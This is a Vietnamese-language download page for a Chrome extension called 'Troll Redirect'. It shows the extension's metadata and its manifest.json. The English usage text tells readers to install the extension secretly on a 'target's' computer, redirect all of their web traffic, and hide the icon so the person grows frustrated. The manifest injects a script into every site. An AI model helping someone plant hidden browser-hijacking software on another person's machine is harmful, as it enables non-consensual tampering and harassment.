Troll Redirect

Redirect all of your friend's webpages automatically by installing this on their computer!

Troll Redirect là gì?

Troll Redirect là một tiện ích mở rộng Chrome được phát triển bởi Aaron Lockhart, và tính năng chính của nó là "Redirect all of your friend's webpages automatically by installing this on their computer!".

Ảnh Chụp Màn Hình của Tiện Ích Mở Rộng

screenshot

Tải xuống tệp CRX của tiện ích mở rộng Troll Redirect

Tải xuống các tệp mở rộng Troll Redirect dưới định dạng crx, cài đặt các tiện ích mở rộng Chrome bằng tay trong trình duyệt hoặc chia sẻ các tệp crx với bạn bè để dễ dàng cài đặt các tiện ích mở rộng Chrome.

Hướng Dẫn Sử Dụng Tiện Ích Mở Rộng

                        Troll and prank your friends with this automatically redirecting app! Upon installing it on your target's computer, click the icon and specify the website to which all requests will be redirected. This is guaranteed to frustrate and annoy your target immensely. Then hide the icon in the chrome menu and sit back while your target gets increasingly angry.                    

Thông Tin Cơ Bản về Tiện Ích Mở Rộng

Tên Troll Redirect Troll Redirect
ID micldaecbnddhhcaojamonojfdffegph
URL Chính Thức https://chrome.google.com/webstore/detail/troll-redirect/micldaecbnddhhcaojamonojfdffegph
Mô tả Redirect all of your friend's webpages automatically by installing this on their computer!
Kích Thước Tệp 949 KB
Số Lần Cài Đặt 192
Phiên Bản Hiện Tại 1.0
Cập Nhật Lần Cuối 2018-12-06
Ngày Phát Hành 2018-12-02
Đánh Giá 4.75/5 Tổng số 4 Đánh Giá
Nhà Phát Triển Aaron Lockhart
Email [email protected]
Loại Thanh Toán free
Ngôn Ngữ Được Hỗ Trợ en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "name": "Troll Redirect",
    "version": "1.0",
    "description": "Redirect all of your friend's webpages automatically by installing this on their computer!",
    "manifest_version": 2,
    "author": "Aaron Lockhart",
    "permissions": [
        "tabs",
        "storage"
    ],
    "content_scripts": [
        {
            "matches": [
                "*:\/\/*\/*"
            ],
            "js": [
                "\/src\/troll.js"
            ],
            "run_at": "document_end"
        }
    ],
    "browser_action": {
        "default_popup": "\/src\/popup.html"
    }
}